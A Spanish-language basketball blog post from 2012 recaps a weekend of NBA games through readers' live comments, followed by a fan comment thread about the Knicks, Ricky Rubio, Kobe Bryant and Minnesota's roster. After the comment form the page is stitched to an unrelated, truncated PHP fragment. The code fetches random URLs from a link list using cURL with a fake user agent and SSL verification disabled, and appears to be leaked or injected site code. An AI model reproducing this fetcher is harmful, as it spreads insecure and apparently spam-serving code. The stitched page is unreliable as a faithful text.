Informe del fin de semana

09 de January de 2012 por txusma

Éxito absoluto de la iniciativa que os presentamos el viernes. Cualquiera que hubiera ido siguiendo los 162 comentarios de la “Cobertura popular” se habría mantenido informado y entretenido a partes iguales. Información aderezada de opinión y debate. Un lujo.

Empecemos repasando lo que pasó el viernes noche. Los Knicks estuvieron a punto de caer ante el peor equipo de la liga, los Washington Wizards (99-96). De hecho, llegaron a perder de 16 puntos a principios del segundo cuarto pero remontaron gracias a una fenomenal actuación de Carmelo y Amare:

“Los Knicks se acercan a los Wizards, al descanso solo uno por debajo. Eso sí, parece que solo juegan Carmelo (21 pts) y Stat (16 pts). Llevan 37 de los 46 puntos que han anotado, y solo 4 jugadores han conseguido puntuar. Muy triste”. Len Bias.

Los Wizards se mantuvieron en la pomada y no fue hasta los últimos segundos que Carmelo Anthony (como no) finiquitó el partido:

“Vaya Triplazo de Carmelo para poner por delante a su equipo, a falta de 15.6, Knicks 98 – 96 Wizards. The Wolf predijo un clutch de los Wizards, será el nuevo Shaqadamus?” Jose Luis. Como comentaba Pop: “Poco ha faltado. Qué manera más insana de NY de complicarse el partido. Sufrir de esta manera ante los Wizards es una nueva decepción para ellos.”

Otro partido que despertó el interés fue el Cavaliers-Minnesota sobre todo para ver frente a frente a los 2 mejores rookies de esta generación, Kyrie Irving y Ricky Rubio. Victoria de los Cavs, 98-87, en un mal partido de los Wolves que al menos sirvió para sacar algunas conclusiones:

“Pues viendo el Cavs@Wolves, veo que Irving es mejor anotador que Rubio, pero no tan buen base. Son dos jugadores bastante iguales en cuanto a general, pero Rubio maneja mucho mejor el juego y dirige las jugadas mejor. Irving tiene mejor tiro, y quizá sea algo más atlético ahora mismo.” Jose Luis.

Por su parte, los Pacers vencieron a los Celtics (87-74), en un “partido marcado por el bajo ritmo y los fallos. Finalmente los Pacers lograron hacerse sin problemas con la victoria gracias a una aceptable actuación coral apoyada por su acierto desde la línea de 3 en ciertos momentos en los que los Celtics amenazaban con remontar.” Ralage.

Los Sixers se deshacieron con facilidad de los Pistons (73-96) en “un partido muy sencillo, con rotación incluso para Nocioni y Vucevic… Unos Pistons lamentables, que se van confirmando noche tras noche como el peor equipo de la NBA…  Spencer Hawes confirma su candidatura a All-Star en el Este”. Sancho88

Y para acabar la noche del viernes, Sancho88 se quedó a gusto criticando a Kobe Bryant a pesar de la victoria de los Lakers (90-97). “Él (Kobe Bryant) es un ego desorbitado, algo más allá de las estadísticas. Da la sensación de que su poder de abstracción en pos de la satisfacción de su yo interno le hace perder la perspectiva, olvidar incluso que está en una cancha de baloncesto y que hay un rival enfrente que juega contra el cronómetro, igual que él mismo… Lakers consiguió poner el 5-4 en el cajetín de victorias-derrotas de la temporada. Y el rival enfrente no era ni candidato a Playoffs, pero Lakers sufrió igual que se sufre un 10 de junio en semifinales de conferencia. Es un mal hábito de este equipo, pero realmente sucede por el ego de Bryant.”

En otros partidos de la noche, victoria de los Bulls frente Orlando (97-83) y de los Thunder sobre los Rockets (109-94).

La noche del sábado contó con menos participación seguramente porque pocos mortales pueden dormir menos de 5 horas dos días seguidos. Heineken nos dejó sus sensaciones después de ver el Denver-San Antonio (117-121): “Los Spurs se pusieron 20 arriba al principio del 2º cuarto con una facilidad pasmosa, les entraba todo.Denver, sin Nene Hilario, sacó un quinteto formado por Lawson-Brewer-Rudy-Affalo-Gallinari y comenzaron a remontar a base de defender bien la línea de pase y no conceder tiros faciles. Intercambio de golpes todo el encuentro y a falta de 3 minutos Rudy mete un triple que deja a Denver a tan solo 4 puntos, pero entonces Jefferson mató el partido al hacerle un tapón a la contra a Lawson, para después llegar y enchufar un triplazo.”

Miami se impuso a los Nets (101-90) con un gran Lebron James. Según rumbero ” Lo de Lebron en el primer cuarto fue un escándalo. No soy un gran admirador suyo precisamente, pero la sensación de superiodad que transmite es aplastante. Hace de todo y lo hace mejor que nadie. Creo que por fin ha dado un gran salto en lo que a inteligencia en el juego se refiere (¿Cuantos triples ha intentado esta temporada? (lo buscaré)). Si lo mantiene en las finales, que es su asignatura pendiente, va a empezar a acumular anillos y le van a faltar dedos”.

En otros partidos destacados del día, derrota de los Bulls frente los Hawks (94-109) que rompe su racha de 6 victorias consecutivas, y victorias de Pacers y Sixers, 2 equipos que se están mostrando muy sólidos. Kevin Durant rescató a los suyos en los últimos segundos del Thunder-Rockets que acabó con victoria visitante 98-95. Los Knicks también ganaron esta vez a unos tristes Pistons que pelean con Wizards y Nets por el título de “Peor equipo de la liga”. Javijaen lo vio y nos contó que fue un “partido muy aburrido, si no eres fan de los Knicks claro!! Solo aguantaron el primer cuarto los de Detroit, y los Knicks hicieron un partido serio casi sin rival. Shumpert salió de titular y Douglas quedó como tercer base detrás también de Bibby, que vuelve a sorprender con 16 puntos y una buena actuación. El rookie Harrellson gustó en la primera parte, y Stoudemire fue el máximo anotador.”

Y anoche, nueva sesión de baloncesto. Aprovechando que el Wolves-Wizards se jugaba a una hora prudente, muchos nos enganchamos al partido. Nueva exhibición de “Rookie Ricky Rubio”, 13 puntos, 6 rebotes y 14 asistencias en un partido fácil para Minnesota ante la banda que son los de Washington (93-72). Debutó Jan Vesely “con un air-ball lamentable en su primer tiro libre” MagicJohnson32. Gracias a la lesión de Michael Beasley, Derrick Williams disfrutó de muchos minutos y dejó buenas sensaciones: ” Es un jugador que está jugando poco, pero lo que hace lo hace bien, se ve un chico serio. Además se está entendiendo muy bien con Ricky. Creo que va a ser un pedazo de jugador para el futuro.” Pop. Sobre la actuación de los Wizards, Toni la resumía perfectamente: “¿Los Wizards se piensan que estan jugando el allstar? Qué poca intensidad, solo “defienden” para lucirse, como por ejemplo el TAPONAZO de McGee a Ricky o el que se acaba de llevar Tolliver. Lo poco aprovechable de los de la capital es principalmente Nick Young.”

Por su parte, los Lakers se merendaron a los Grizzlies con un agran actuación de todo su quinteto si en este entrara Steve Blake en lucgar de Dereck Fisher (82-90) y los Thunder consiguieron su tercera victoria consecutiva en su tercer partido en 3 días. Esta vez frente los Spurs (96-108). Hay que estar muy fuertes para hacer algo parecido.

Comenta

29 comentarios a esta entrada

  1. Denise dice:
    #1

    Partidazo de Matt Barnes. Jugador archicriticado en el blog y que demuestra que cuando le dan confianza y se siente importante es un jugadorazo.
    Y Howard desquiciado, dejando con el culo al aire al equipo. Que traigan ya a Gasol y Bynum a Orlando!!

      Citar

  2. ralage dice:
    #2

    Pues si, la verdad es que estuvo genial ir intercambiando impresiones de los partidos, durante el fin de semana

    Acabo de ver el partidos de los Suns…17 asistencias de Nash por 3 pérdidas, lo que podría pasar un día cualquiera en el que sus compañeros enchufasen sus tiros….
    Además las hizo sin jugar el último cuarto (por estar el partido decidido) cuando podría haber intentado ir a por su récord de 22 asistencias

      Citar

  3. melo15 dice:
    #3

    los knicks semerendaron a los pistons en ekl segundo cuarto con un generoso Melo 7 asistencias

      Citar

  4. Jose Luis dice:
    #4

    La verdad es que tuvo muy buena acogida la propuesta. El sábado no me quedé porque el domingo madrugaba, y hoy con las clases chungo, aunque estuve a punto de no ir a la facultad y quedarme. Un honor que me citéis tantas veces, y agradecer a todos los que estuvieron por aquí informando, opinando y debatiendo, haciéndonos pasar un buen rato 🙂 Ojalá sea así todos los fines de semana y nos lo sigamos pasando bien todos por aquí.

    Saludos chicos!

      Citar

  5. The wolf dice:
    #5

    Primero decir que confiaba en la mala suerte de los knicks mas que en el acierto de wall al predecir un clutch de wizzards pero claro me salio mal la prediccion xD

    Por otro lado…que mal lo vamos a pasar el año que viene los seguidores de los suns sin nash…es que el partido de ayer fue una locura…solo hay que ver el resumen de nba.com para saber como fue el partido…3 minutos de asistencias magistrales….de una cosa estoy seguro el año que viene mi candidato al anillo y al cual animare sin cesar sera aquel en el que juegue nash…como si son los heats vamos…y nada nos plantamos con 4-4 y estoy viendo que como nash siga en plan de ganar partidos el solo igual nos vamos a quedar algo lejos de pescar en el draft del año que viene…pero bueno mientras tanto a disfrutar con el gran virtuoso del basket

      Citar

  6. Len Bias dice:
    #6

    La verdad que fue una muy buena idea lo de los comentarios para seguir la jornada. Yo mientras veía un par de partidos iba siguiendo el resto por lo que iban diciendo por aquí.
    Muy fuerte lo de Ricky, yo confiaba en que en la NBA se mostrase como era de juvenil pero la verdad que no tanto ya desde tan pronto. Ayer incluso parecía el líder ofensivo del equipo.

    PD: Por cierto, la primera cita del artículo sobre los Knicks la dije yo. Pero vamos, es lo de menos 😉

      Citar

  7. Pop dice:
    #7

    Yo vi sólo un poco del partido de los Lakers, y aunque al final parece que se enmendó bastante, vi a un Pau bastante tristón, con muy poca chispa. Le están dando injustamente en LA, pero verle casi arrastrando los pies seguro que saca de quicio a más de uno.

    Eso sí, ahora no pasa de los 10 tiros, y la mayoría buscándoselos él. Que mantenga más o menos las estadísticas anotadoras es para quitarse el sombrero. No creo que nadie pueda dudar de su profesionalidad.

      Citar

  8. rumbero dice:
    #8

    The wolf:
    Primero decir que confiaba en la mala suerte de los knicks mas que en el acierto de wall al predecir un clutch de wizzards pero claro me salio mal la prediccion xD

    Por otro lado…que mal lo vamos a pasar el año que viene los seguidores de los suns sin nash…es que el partido de ayer fue una locura…solo hay que ver el resumen de nba.com para saber como fue el partido…3 minutos de asistencias magistrales….de una cosa estoy seguro el año que viene mi candidato al anillo y al cual animare sin cesar sera aquel en el que juegue nash…como si son los heats vamos…y nada nos plantamos con 4-4 y estoy viendo que como nash siga en plan de ganar partidos el solo igual nos vamos a quedar algo lejos de pescar en el draft del año que viene…pero bueno mientras tanto a disfrutar con el gran virtuoso del basket

    Menuda lección en menos de media horita. Que no se retire nunca este tio!!!
    Yo estaré como tú. Si es a los Heat pues mira…al menos nos divertiremos viendo a Wade y Lebron poniéndose las botas. También hay unos que juegan de azul e igual les vendría bien…veremos

      Citar

  9. Rompe dice:
    #9

    Excelente idea, que además descarga un poco de trabajo a los colaboradores habituales. Sólo he echado en falta la sección de premios jeje.

      Citar

  10. Blade Petrovic dice:
    #10

    Me gusto la idea pero os falta mencionar el gran partido de Meeks que va a ser el Mip xd

      Citar

  11. Txusma dice:
    #11

    Len Bias:

    PD: Por cierto, la primera cita del artículo sobre los Knicks la dije yo. Pero vamos, es lo de menos

    Muy cierto. Ya lo he corregido.

      Citar

  12. Javijaen dice:
    #12

    Solo lamento no haber podido informar de los partidos de los Knicks en directo, pero es que tengo que trabajar y los veo por la noche… y cuando puedo!!!
    De todas formas gracias por nombrarme y no hay mejor sitio (al menos en castellano, en inglés no he buscado), donde se pueda uno empapar de NBA, con la cantidad de entendidos que hay aquí.
    Gran iniciativa y go Knicks!

      Citar

  13. Vader dice:
    #13

    Javijaen:
    Gran iniciativa y go Knicks!

    ¡¡¡Amén!!!

    😀

      Citar

  14. Sancho88 dice:
    #14

    Denise:
    Partidazo de Matt Barnes. Jugador archicriticado en el blog y que demuestra que cuando le dan confianza y se siente importante es un jugadorazo.
    Y Howard desquiciado, dejando con el culo al aire al equipo. Que traigan ya a Gasol y Bynum a Orlando!!

    Esto es como buscar a Wally. Bingo!! el comentario wally de Denise de la semana, jeje. que perseverancia, chico

      Citar

  15. Sancho88 dice:
    #15

    Por cierto, Howard no anda bien, y eso se nota en muchas de las jugadas, que en vez de irse como una bestia, como lo que es, a romper el aro, la pasa en modo maricón al alero. contra los kings estuvo a dos minutos y medio de hacer 0 puntos… su peor registro en la NBA, teniendo en cuenta una vez que hizo solo 1 punto en sus primeras temporadas. Al final creo que hizo 5, pero vamos, no anda fino, precisamente

      Citar

  16. Sancho88 dice:
    #16

    Blade Petrovic:
    Me gusto la idea pero os falta mencionar el gran partido de Meeks que va a ser el Mip xd

    Cierto, fue su gran noche. Cuentan que el pavo se motivó viendo el videoclip de Raphael, ese que canta… “Qué pasará, que misterio habrá, puede ser mi gran nocheeeeeee…”, y a partir de ahí todo fue coser y cantar. A la altura de Meeks solo podemos poner el primer cuarto de Milicic contra los Cavs. Un espejismo a la altura del 5/5 en triples de Radmanovic contra Chicago no meo.

      Citar

  17. Sancho88 dice:
    #17

    Y por cierto, no fui el único que se quedó a gusto con Bryant. No sé si leísteis al día siguiente lo que escribió Daimiel en el as, pero venía un poco a criticar el Kobe-sistema. Y no es que uno odie a Bryant, o no valore su carrera y demás. Al contrario, yo siempre he dicho que me parece el mejor jugador del mundo, y de hecho, creo que si alguien se puede comparar con Dios (creo que no es necesario decir a qué dios me refiero), es él. Y como tal, debe responder en todo y hay que exigirle el máximo, porque lo puede dar. Yo solo digo que a mí me gustaba mucho más el compañerismo que demostró los dos años de los anillos, y que ahora le veo mucho más egoísta, como pasando de esa evolución en el juego. Este tío no ha empeorado en calidad, ni de coña. Cada año incluso parece que sus movimientos son más fluídos, que tiene mejor mecánica de tiro, etc. Pero sí es un hecho que este año está super egoísta. Venía a decir Daimiiel que se ha tirado el tío el doble de tiros a canasta que Gasol, y jugando menos minutos. Y eso es por la permisividad que le da Brown, y en parte, porque no le respeta tanto como entrenador. Con Jackson no tenía pelotas a hacer un 6 de 28. Segurísimo. Si no os parecen suficientes argumentos para criticar ese egoísmo, teniendo en cuenta que Pau y Bynum también se las pueden tirar… pues bueno, será que no tengo ni idea. Pero en este caso me acompaña un argumento de autoridad como el de daimiel

    http://www.as.com/baloncesto/articulo/kobe-abduce-mike-brown-calderon/20120107dasdaibal_4/Tes

      Citar

  18. esteban dice:
    #18

    Nueva derrota de los wolves, ahora frente a los todopoderosos ramptors.
    Lo dije antes del arranque de esta temporada y creo q es hora de repetirlo

    Los wolves erraron en mantener su plantilla, es un grupo horrible sin destino y desperdiciando años valiosos de love q podria ser un MVP

    Debieron vender su pick 2, era claro q williams no era lo que necesitaban y esta lejos de ser un juygador en quien se pueda cimentar una franquicia, es un buen jugador con un techo muy bajo, el valor de su pick era mayor antes de elegirlo q ahora

    Tamb debieron mover a beasley luego de un año aceptable y con cierto valor, un valor q ah perdido ahoira ya q nunca puede jugar de 4 y sus minutos se reducen por williams y randpholp, hoy su valor es mucho menor q al arrancar la temp

    Debieron mover a wes jhonson, mientras aun se creia q podia dar algo, yo creo q aun puede, pero la testarudez de hacerlo jugador de 2 lo ha destruido, es claramente alero, y hoy esta jiugando peor q el aÑo pasado

    Le erraron con barea, hubiesen guardado esos 5 mill mas otros 3 q tienen y fichaban a caron butlen, un jugador por lejos mas regular y consagrado y mas necesario teniendo a ridnour y rubio

    Yo hubiese juntado a beasley, el pick 2 y jhonson, por monta ellis o granger, q creo se podria haber dado antes de esta temporada, ahora es imposible y no fichaba a barea y me la jugaba por butler, y hoy estariamos hablando de otro equipo

    Puede q los contratos de butler, ellis o granger sean altos y no del todo buenos, pero para dar un salto de calidad a veces debes comerte esos contratos, sino que lo diga chicago con boo2r, atlanta con jj, lakers con artest, clipperscon butler, los miles de contratos de los mavs…

    Hoy veo a los wolves casi sin destino, siguen de reconstruccion cuando tienen a un allstar con num MVP en su equipo, q mas q love necesitan para darse cuenta q es hora de dar el salto y olvidarse de rookies y apuestas, sera mecesario q love pida un traspaso? Quiza si…

      Citar

  19. Nacho dice:
    #19

    Esteban, estoy casi totalmente de acuerdo contigo. Pero aún así, creo que pueden dar más de una sorpresa este año.

      Citar

  20. Denise dice:
    #20

    Yo no comparto mucha de la opinion de esteban.

    Con Derrick Williams hay que tener paciencia, el chaval solo lleva tres semanas de profesional y no lo está haciendo mal, y Barea me parece un fichaje acertadisimo.

    A Wesley Johnson si lo vendería y a Beasley por supuestisimo. Pero las cosas no estan tan mal como tu la pintas, tienen margen y “activos” (jugadores para intercambiar) para hacerse con un buen 2 y un buen 5.

    Yo particularmente iría a por Marcin Gortat, ofreciendo a Wesley Johnson + Milicic ó solamente a Michael Beasley. Me encantaria ver una pintura con Love y Gortat juntos.

      Citar

  21. Sancho88 dice:
    #21

    yo también, y creo que por primera vez, comparto todo lo que dice Esteban. Les has dado duro, pero con bastante razón. Es decir, como bien dices, han desaprovechado la oportunidad de tirar los muros de la liga y colocarse en cuotas muy muy serias en playoffs. Los 5 millones y pico de Beasley daban para haberlos gestionado mucho mejor en algún traspaso, y dar la confianza total a Derrick Williams. Luego a Love le falta un compañero en la zona, y habiendo los agentes libres que había es delito no haber piyado un Dalembert, aunque sea, o uno de los cuatro o cinco que tiene Denver. Con un Koufos, o un Mozgov, que son jugadores que pueden ser titulares perfectamente en cualquier equipo (y ya lo han demostrado con la baja de Nené), acompañando a Love y con Milicic y Tolliver de suplentes, ya serían un equipo serio. Luego, Ricky y Ridnour en la dirección yo lo veo bien, pero claro, el problema son Wes Johnson, Barea y Beasley. Si te ahorras el contrato de Barea, liveras a Beasley y demás, tienes un colchón de millones para haber hecho alguna oferta más que interesante, y haber completado un quinteto de lujo con Ricky, Williams y Love, más el escolta y el pívot titulares que estamos comentando. Les han puesto la oportunidad de ser alguien en la liga, y se han conformado. No obstante, comparto el comentario también de Nacho, y es que tienen pinta de dar muchos sustos. No tienen la mentalidad de equipo ganador, pero que son un hueso duro en el oeste, seguro. Y si no, les preguntamos a Dallas y Spurs a ver qué opinan

      Citar

  22. nach dice:
    #22

    Se han conformado de momento, no hay que olvidar que es un equipo joven, pueden dejar que las piezas maduren y vayan encajando en la liga (Ricky, Williams), y siempre y cuando mantengan a Love, creo que pueden ser un aspirante serio en un futuro, para ser un equipo claro de playoff les falta un 5 de verdad, y para aspirar a todo un 2 y algún jugador de refresco de nivel. Para mí son un equipo no pensado para ahora, si no a 2-3 temporadas vista siempre y cuando mantengan a Love.

      Citar

  23. Txusma dice:
    #23

    Sancho,

    Mozgov o Koufos son mejores que Milicic? El año pasado promedió 9 puntos y 5 rebotes que no están tan mal para 24 minutos de media.

      Citar

  24. TheDeerHunter dice:
    #24

    Yo creo que nadie en Minnesotta puede tener una sóla queja del rendimiento de Milicic allí.

      Citar

  25. Vader dice:
    #25

    Pues a mi Williams me esta gustando mucho, cada día más. Lo veo con mejor tiro y más rápido de lo que se decía.

      Citar

  26. melo15 dice:
    #26

    Yo primero venderia a Beasley y dejaria un par de meses a Wes haber si se adapta y si no al la calle venderia a Milicic con Beasley a los Suns para que Nash le de caña, tampoco tienen mal equipo Ricky Bare Wes Love y Milicic es un buen equipo

      Citar

  27. Sancho88 dice:
    #27

    Txusma:
    Sancho,

    Mozgov o Koufos son mejores que Milicic? El año pasado promedió 9 puntos y 5 rebotes que no están tan mal para 24 minutos de media.

    Yo creo que por potencial sí eh? yo a Koufos le veo haciendo un 10-5 mínimo, tiene muy buenos fundamentos, aunque le falla horrorosomanente su tiro libre, y mozgov midiendo 2,15…. también puede imponer. Nadie duda de la clase de milicic, pero bueno, en defensa no es demasiado rápido y hay gente muy fuerte ahora mismo en esa posición. yo solo digo que podrían intentar un traspaso buscando algo más prometedor a medio plazo

      Citar

  28. esteban dice:
    #28

    No se quienes pueden ser pero los wolves deben mover sus fichas rapido, deberian cambiar a barea q no tiene un contrato alto y aun esta vigente el recuerdo de sus play offs, y meter en varios cambios a muchos de sus jugadores, estan 3 y 7 perdiendo con raptos, cavs entre otros y superando a equipos viejos q en sus sueños les ganarian un partido de PO

    Eh atacado a rubio, mas que nada para llevarle la contra a los españoles, pero la verdad esta jugando genial y es hora q sea titular y una especie de lider del equipo, el mas love los unicos intocables, al resto los cambiaria a todo, la mayoria de su equipo son jugadores “utiles” como suplentes o de rol con contratos bajos, yo los cambiaria a todos

      Citar

  29. Pop dice:
    #29

    Buah, acabo de ver la primera mitad del CHI-MIN y vaya remontada. Chicago iba ganando de 22 (!), con un Love sin conseguir canasta en todo el primer cuarto, y en los ultimos 5 minutos han dado un recital, con Love-Ricky en modo All-Star, para dejar el resultado sólo 6 abajo. Love ha metido 11 puntos y Ricky ha dado 7 asistencias, ambos en el 2º cuarto. Por parte de los Bulls Rose sigue siendo una pesadilla.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>